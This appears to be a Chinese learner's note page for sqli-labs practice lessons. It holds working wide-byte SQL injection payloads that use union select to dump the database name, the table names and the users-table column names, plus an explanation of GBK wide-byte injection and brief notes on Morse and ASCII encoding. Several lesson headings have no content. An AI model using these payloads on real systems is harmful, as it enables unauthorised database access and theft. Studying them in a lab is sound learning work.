lesson46_49
lesson37_41
lesson37
与lesson34是同种类型的 替身 就是处理post内容,同时包含宽字节注入
因为相同的payload和方法都能用所以我就重新打一遍
�’ union select 1,database()#
�’ union select group_concat(table_name)from information_schema.tables where table_schema=database(),database()#
�’ union select 1,group_concat(column_name)from information_schema.columns where table_name=0x7573657273#
堆叠注入(stacked injection)
内容参考 mysql注入天书
lesson29_31
lesson32_36
宽字节注入
宽字节:GB2312、GBK、GB18030、BIG5、shift_JIS等就是常说的宽字节,实际上只有两个字节。宽字节带来的安全问题主要是ascii字符(一字节)的现象,即将两个ASCII字符误认为一个宽字节字符。中文、韩文、日文等均存在宽字节,英文默认一个字节。
在使用PHP连接MySQL的时候,当设置”set character set client + gbk”
例子:id=1‘ 处理1' 进行编码 1%5c%27 带入sql后进行id=' and XXX此时无法完成注入
id=1%df 处理1%df\进行编码1%df%5c%27 带入sql后id=1運’ andXXX此时存在宽字节注入漏洞
lesson27_28a
lesson24_26a
编码篇
Morse编码
摩尔斯电码(Morse code)是一种时通时断的信号代码,通过不同的排列 顺序来表达不同的英文字母、数字和标点符号。是由美国人艾尔菲德·维 尔(Alfred Lewis Vail)与萨缪尔·摩尔斯(Samuel Finley Breese Morse) 在1836年发明。由点(·)和划(-)组成。

ascii编码
ASCII(American Standard Code for Information Interchange,美国信息交换标准代码)是基于拉丁字母的一套 电脑编码系统,主要用于显示现代英语和其他西欧语言。它是现今最通用的单字节编码系统,并等同于国际标准ISO/IEC 646。




